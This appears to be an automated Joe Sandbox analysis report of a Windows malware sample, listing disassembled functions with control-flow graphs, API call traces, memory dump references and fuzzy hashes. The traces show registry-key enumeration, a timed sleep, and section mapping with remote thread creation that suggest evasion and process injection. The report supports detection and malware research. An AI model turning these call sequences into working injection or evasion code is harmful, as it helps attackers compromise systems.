                                                                                                                                      control_flow_graph 310 402600 311 402601-402604 310->311 312 40273a 311->312 313 40260a-402660 NtOpenKey 311->313 314 402743-402787 call 401232 312->314 323 402666-40267d 313->323 324 40272c-402735 313->324 330 402683-4026a5 323->330 331 402726-402729 NtClose 323->331 324->311 337 402720 330->337 338 4026a7-4026ab 330->338 331->324 337->331 338->337 339 4026ad-4026b6 338->339 340 4026b8-4026bb 339->340 340->337 341 4026bd-4026d5 NtEnumerateKey 340->341 342 4026d7-4026fe NtEnumerateKey 341->342 343 40271d-40271e 341->343 345 402700-402704 342->345 346 402717 342->346 343->340 345->346 347 402706-402715 call 401cef 345->347 346->343 347->346 350 40273c 347->350 350->314
                                                                                                                                      APIs
                                                                                                                                      • NtOpenKey.NTDLL(F9F9F7E5,00000009,F9F9F7CD), ref: 00402658
                                                                                                                                      • NtEnumerateKey.NTDLL(?,?,00000000,00000000,00000000,00000000), ref: 004026CB
                                                                                                                                      • NtEnumerateKey.NTDLL(?,?,00000000,?,00000002,00000002), ref: 004026F6
                                                                                                                                      • NtClose.NTDLL(?), ref: 00402729
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Enumerate$CloseOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4196332011-0
                                                                                                                                      • Opcode ID: bb34d06be76bb7b501c8afc06c01172f7ca9cf9edd1b1584a752fe27c3b853fc
                                                                                                                                      • Instruction ID: 6c5ac5058aa2b5087ec3ea8b6a8dc2ca808718e1067c45ee26b27d55205dc1df
                                                                                                                                      • Opcode Fuzzy Hash: bb34d06be76bb7b501c8afc06c01172f7ca9cf9edd1b1584a752fe27c3b853fc
                                                                                                                                      • Instruction Fuzzy Hash: E9414C7190020AEFDF119F90CA8DFAEBB75FF44704F208066E6017A1D1D7B85A45DB66
                                                                                                                                      Function 004023B0 Relevance: 4.8, APIs: 3, Instructions: 328COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 351 4023b0-4023b8 352 4023b9-4023cc 351->352 356 4023db-4023fb call 401232 352->356 364 4023a1-4023ad 356->364 365 4023fd-402415 356->365 366 402450-402456 365->366 367 402417-402419 365->367 370 402459-402467 366->370 368 4023da 367->368 369 40241b-40241c 367->369 368->356 369->370 372 40241e 369->372 371 402479 370->371 373 4024aa 371->373 374 40247b-40248b 371->374 375 402420-402423 372->375 376 402439-40243e 372->376 377 4024ac-4024df 373->377 378 40248d-40249b 374->378 379 40249f-4024b6 374->379 380 402440-40244c 375->380 381 402425 375->381 376->371 376->380 392 4024e2-4024f6 call 401232 call 40250f 377->392 393 4024d8-4024db 377->393 379->377 380->366 381->375 384 402427-40242b 381->384 384->352 387 40242d-402434 384->387 387->376 398 4024f8-4024ff 392->398 399 40255a-402577 392->399 393->392 400 402501-40250d 398->400 401 402578-40260e 398->401 399->401 415 402614-402660 NtOpenKey 401->415 418 402666-40267d 415->418 419 40272c-402735 415->419 422 402683-4026a5 418->422 423 402726-402729 NtClose 418->423 425 40273a 419->425 426 40260a-40260f 419->426 433 402720 422->433 434 4026a7-4026ab 422->434 423->419 427 402743-402787 call 401232 425->427 426->415 433->423 434->433 436 4026ad-4026b6 434->436 438 4026b8-4026bb 436->438 438->433 440 4026bd-4026d5 NtEnumerateKey 438->440 442 4026d7-4026fe NtEnumerateKey 440->442 443 40271d-40271e 440->443 447 402700-402704 442->447 448 402717 442->448 443->438 447->448 450 402706-402715 call 401cef 447->450 448->443 450->448 454 40273c 450->454 454->427
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6a00a9c7d13a07c51dd77bc3c2eb113ae7025efeb939adfbc7958f87c2f127ae
                                                                                                                                      • Instruction ID: a32d40ac3b9c7093630245df7894846315545a5dc73766260dcb213d7d2a491e
                                                                                                                                      • Opcode Fuzzy Hash: 6a00a9c7d13a07c51dd77bc3c2eb113ae7025efeb939adfbc7958f87c2f127ae
                                                                                                                                      • Instruction Fuzzy Hash: 22B1D431548285AFDB128B708E5DBAA7F70AF01300F1881AFE9456B1D3D3BC9906D76A
                                                                                                                                      Function 0040250F Relevance: 4.7, APIs: 3, Instructions: 220nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 455 40250f 456 402510-402513 455->456 457 402515-40251b 456->457 458 402526-40260e call 402600 456->458 463 402521-402524 457->463 464 40273c 457->464 490 402614-402660 NtOpenKey 458->490 463->456 466 402743-402787 call 401232 464->466 493 402666-40267d 490->493 494 40272c-402735 490->494 497 402683-4026a5 493->497 498 402726-402729 NtClose 493->498 500 40273a 494->500 501 40260a-40260f 494->501 504 402720 497->504 505 4026a7-4026ab 497->505 498->494 500->466 501->490 504->498 505->504 506 4026ad-4026b6 505->506 507 4026b8-4026bb 506->507 507->504 508 4026bd-4026d5 NtEnumerateKey 507->508 509 4026d7-4026fe NtEnumerateKey 508->509 510 40271d-40271e 508->510 512 402700-402704 509->512 513 402717 509->513 510->507 512->513 514 402706-402715 call 401cef 512->514 513->510 514->464 514->513
                                                                                                                                      APIs
                                                                                                                                      • NtOpenKey.NTDLL(F9F9F7E5,00000009,F9F9F7CD), ref: 00402658
                                                                                                                                      • NtEnumerateKey.NTDLL(?,?,00000000,00000000,00000000,00000000), ref: 004026CB
                                                                                                                                      • NtEnumerateKey.NTDLL(?,?,00000000,?,00000002,00000002), ref: 004026F6
                                                                                                                                      • NtClose.NTDLL(?), ref: 00402729
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Enumerate$CloseOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4196332011-0
                                                                                                                                      • Opcode ID: 42da9b558526dab9f9f7d6e1865eeab63f52cf10c2a35edcbf27946a2bd194e1
                                                                                                                                      • Instruction ID: af6aad5066364b183d814378913c990334d1b5a1068601ef9d2b9d113d753dd3
                                                                                                                                      • Opcode Fuzzy Hash: 42da9b558526dab9f9f7d6e1865eeab63f52cf10c2a35edcbf27946a2bd194e1
                                                                                                                                      • Instruction Fuzzy Hash: C4817F304093856FDB128B608E6DBAABF70BF01304F18C1AFD8456A5D3D7B89949D76A
                                                                                                                                      Function 00402595 Relevance: 4.6, APIs: 3, Instructions: 144nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 517 402595-40260e 525 402614-402660 NtOpenKey 517->525 528 402666-40267d 525->528 529 40272c-402735 525->529 532 402683-4026a5 528->532 533 402726-402729 NtClose 528->533 535 40273a 529->535 536 40260a-40260f 529->536 543 402720 532->543 544 4026a7-4026ab 532->544 533->529 537 402743-402787 call 401232 535->537 536->525 543->533 544->543 546 4026ad-4026b6 544->546 548 4026b8-4026bb 546->548 548->543 550 4026bd-4026d5 NtEnumerateKey 548->550 552 4026d7-4026fe NtEnumerateKey 550->552 553 40271d-40271e 550->553 557 402700-402704 552->557 558 402717 552->558 553->548 557->558 560 402706-402715 call 401cef 557->560 558->553 560->558 564 40273c 560->564 564->537
                                                                                                                                      APIs
                                                                                                                                      • NtOpenKey.NTDLL(F9F9F7E5,00000009,F9F9F7CD), ref: 00402658
                                                                                                                                      • NtEnumerateKey.NTDLL(?,?,00000000,00000000,00000000,00000000), ref: 004026CB
                                                                                                                                      • NtEnumerateKey.NTDLL(?,?,00000000,?,00000002,00000002), ref: 004026F6
                                                                                                                                      • NtClose.NTDLL(?), ref: 00402729
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Enumerate$CloseOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4196332011-0
                                                                                                                                      • Opcode ID: 78186842e91a73d37e52b9aadd370abdad8b8cb84815d1aad615ebabb8bd498c
                                                                                                                                      • Instruction ID: 3a269d0cca06ea8c5e40adcf94021f09073695a508613ac771173a695d32f02e
                                                                                                                                      • Opcode Fuzzy Hash: 78186842e91a73d37e52b9aadd370abdad8b8cb84815d1aad615ebabb8bd498c
                                                                                                                                      • Instruction Fuzzy Hash: BA517130809385AFDB12CFA0CD59BAABF74BF01300F18C59EE9447A1D2D7B89949DB65
                                                                                                                                      Function 00402FFC Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 565 402ffc-403020 566 403026-40303e 565->566 567 40313f-403144 565->567 566->567 568 403044-403055 566->568 569 403057-403060 568->569 570 403065-403073 569->570 570->570 571 403075-40307c 570->571 572 40309e-4030a5 571->572 573 40307e-40309d 571->573 574 4030c7-4030ca 572->574 575 4030a7-4030c6 572->575 573->572 576 4030d3 574->576 577 4030cc-4030cf 574->577 575->574 576->569 579 4030d5-4030da 576->579 577->576 578 4030d1 577->578 578->579 579->567 580 4030dc-4030df 579->580 580->567 581 4030e1-40313c RtlCreateUserThread NtTerminateProcess 580->581 581->567
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateProcessTerminateThreadUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1921587553-0
                                                                                                                                      • Opcode ID: 9fc07a47e82ee84ddc63006ac5df85d4bbf6348d323fe261367906c717befcc8
                                                                                                                                      • Instruction ID: 3fe51a1ca5390821cec685e94d0c6465df1e8e695ad90730d317ab7b65ede5da
                                                                                                                                      • Opcode Fuzzy Hash: 9fc07a47e82ee84ddc63006ac5df85d4bbf6348d323fe261367906c717befcc8
                                                                                                                                      • Instruction Fuzzy Hash: 83414732618E0C4FD778EE6CA84967377D5E798311B1643AAD809D3398EE30D85187C6
                                                                                                                                      Function 0040197F Relevance: 1.3, APIs: 1, Instructions: 61sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 582 40197f-4019e3 call 401232 Sleep call 4014a5 596 4019f2-401a37 call 401232 582->596 597 4019e5-4019ed call 401597 582->597 597->596
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004019CE
                                                                                                                                        • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                        • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                        • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1885482327-0
                                                                                                                                      • Opcode ID: 679fef2a4a3561db55f23cc84b4bc5a750ce9d05a361d1e252e4cc0622c4667b
                                                                                                                                      • Instruction ID: c811fe4ff13ed005d7b90e820295dbd79effc60c5395b5f7653e819f54dd3e9f
                                                                                                                                      • Opcode Fuzzy Hash: 679fef2a4a3561db55f23cc84b4bc5a750ce9d05a361d1e252e4cc0622c4667b
                                                                                                                                      • Instruction Fuzzy Hash: C30180B2709204FAD7006A949E51E7A3668AB40751F704177BA43780F5D57C8913FA6F
                                                                                                                                      Function 0040199B Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 611 40199b-4019e3 call 401232 Sleep call 4014a5 625 4019f2-401a37 call 401232 611->625 626 4019e5-4019ed call 401597 611->626 626->625
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004019CE
                                                                                                                                        • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                        • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                        • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1885482327-0
                                                                                                                                      • Opcode ID: 6453cb712f97e6c3e73584405a9ab922ca49c2d0657cff5b7762b64cca9ea8ac
                                                                                                                                      • Instruction ID: df1ff986622998e63959179eb8c927f0d3cda0a7536f4bc564826170f3d4db9c
                                                                                                                                      • Opcode Fuzzy Hash: 6453cb712f97e6c3e73584405a9ab922ca49c2d0657cff5b7762b64cca9ea8ac
                                                                                                                                      • Instruction Fuzzy Hash: 35015AB2709245EADB009A849EA1FBA3265AB44711F708177BA43B80F5D53C8513BE6F
                                                                                                                                      Function 0040198D Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 640 40198d-4019e3 call 401232 Sleep call 4014a5 653 4019f2-401a37 call 401232 640->653 654 4019e5-4019ed call 401597 640->654 654->653
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004019CE
                                                                                                                                        • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                        • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                        • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1885482327-0
                                                                                                                                      • Opcode ID: fccf324384e8c83a597fe9a4c1c3b15edd22fbc21d66c74b7e4d5d85c879ca18
                                                                                                                                      • Instruction ID: bce1075bd6c2f39f63a36d665dcafc0c7d86377b285ab1b50b00bcc6d13fa5ee
                                                                                                                                      • Opcode Fuzzy Hash: fccf324384e8c83a597fe9a4c1c3b15edd22fbc21d66c74b7e4d5d85c879ca18
                                                                                                                                      • Instruction Fuzzy Hash: 9801DFB2709204EADB009A849E51FBA3325AB40711F304177B603780F1C53C8513BF6F
                                                                                                                                      Function 004019A2 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004019CE
                                                                                                                                        • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                        • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                        • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1885482327-0
                                                                                                                                      • Opcode ID: eb729094e9229a7d192e463be9b74b04ee994b65f43a785d20844c218813b556
                                                                                                                                      • Instruction ID: c54bd8278c0422601412dfbbaffd59a802a85759ca8d789bb59a0b432e62659e
                                                                                                                                      • Opcode Fuzzy Hash: eb729094e9229a7d192e463be9b74b04ee994b65f43a785d20844c218813b556
                                                                                                                                      • Instruction Fuzzy Hash: EA018B72719245FADB009A859D51FAA3629AB44711F304177B603B80F2D53C8512BE6F
                                                                                                                                      Function 0040199F Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004019CE
                                                                                                                                        • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                        • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                        • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1885482327-0
                                                                                                                                      • Opcode ID: a0b1578ffed3b6090f3330c07849541098d99241da9b310e6fbab4e92d5445be
                                                                                                                                      • Instruction ID: c4e31ccbe51ade33d5422f141b2801c2a58f39f165a814ade8e731c3b2ff61ab
                                                                                                                                      • Opcode Fuzzy Hash: a0b1578ffed3b6090f3330c07849541098d99241da9b310e6fbab4e92d5445be
                                                                                                                                      • Instruction Fuzzy Hash: 4D016D72719245EADB005A949E51FBA3625AB44711F304177B613780F5C53C8513BF2F
                                                                                                                                      Function 004019AB Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004019CE
                                                                                                                                        • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                        • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                        • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1885482327-0
                                                                                                                                      • Opcode ID: 82c4946c3625fc2f16c037b40791823d007d1c4d34ee98bf3048008ecc9f3771
                                                                                                                                      • Instruction ID: f3fa57dbd4666dd34be6456021c8c5f3785eb3dc384f664cb3cf41b0e000e7fa
                                                                                                                                      • Opcode Fuzzy Hash: 82c4946c3625fc2f16c037b40791823d007d1c4d34ee98bf3048008ecc9f3771
                                                                                                                                      • Instruction Fuzzy Hash: E6F03176319145EADB106A95AD51FB93725AB44321F304177F613780F6C63C8512BF2F
                                                                                                                                      Function 004019BD Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004019CE
                                                                                                                                        • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                        • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                        • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1885482327-0
                                                                                                                                      • Opcode ID: 89346fa385080b9f3f133b0d3ec6a03e7f67549b3ed6c5b23df429eabbd15011
                                                                                                                                      • Instruction ID: 84750dfba710f96cae65e071dcd4f88f4ec9410a91285a7ed0e292360a6f7811
                                                                                                                                      • Opcode Fuzzy Hash: 89346fa385080b9f3f133b0d3ec6a03e7f67549b3ed6c5b23df429eabbd15011
                                                                                                                                      • Instruction Fuzzy Hash: BEF04F72319245FADB015A94AD41BBE3769AB44311F308177B613B80F5C53C8512BF2F
                                                                                                                                      Function 004019B2 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004019CE
                                                                                                                                        • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                        • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                        • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
